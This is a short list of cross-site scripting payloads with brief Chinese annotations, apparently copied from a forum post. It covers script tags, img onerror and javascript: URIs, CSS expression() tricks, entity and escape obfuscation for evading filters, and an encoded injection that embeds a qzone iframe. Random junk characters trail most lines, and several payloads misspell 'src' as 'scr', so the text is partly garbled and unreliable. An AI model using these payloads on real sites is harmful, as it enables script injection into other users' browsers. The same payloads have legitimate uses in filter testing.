<script>alert("跨站")</script> (最常用)5 [& _- r+ N+ e- `9 W
<img scr=javascript:alert("跨站")></img>+ n! H& n* K$ e7 q/ e: D3 ?
<img scr="javascript: alert(/跨站/)></img># k# n8 L5 H( w2 s, P" I
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)2 ^3 N% C3 S8 ^ R* P; N' x
<img scr="#" onerror=alert(/跨站/)></img>' Z( ?0 p" u1 Q/ E0 w) H
<img scr="#" style="xss:expression(alert(/xss/));"></img>; G1 S x9 V9 M3 Y' |& L; g" |
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
2 M2 F0 H' F! f0 U<img src=vbscript:msgbox ("xss")></img>+ a0 K% f |+ d0 @3 z
<style> input {left:expression (alert('xss'))}</style>( _4 B H1 _6 w5 ]0 Y& K! p
<div style={left:expression (alert('xss'))}></div>; [/ \* M3 I& r! }
<div style={left:exp/* */ression (alert('xss'))}></div>5 }! U5 k i \9 Y! `
<div style={left:\0065\0078ression (alert('xss'))}></div>& O. h! ?0 z5 v" Z' S# B. ^, Z( r
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
: K& q$ z4 H8 B$ J5 o6 bunicode <div style="{left:expRessioN (alert('xss'))}">& p j, V1 k: p
: w/ H$ q4 X& P1 y" L5 ^
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["; Z( O$ U: G( Q& S, g
|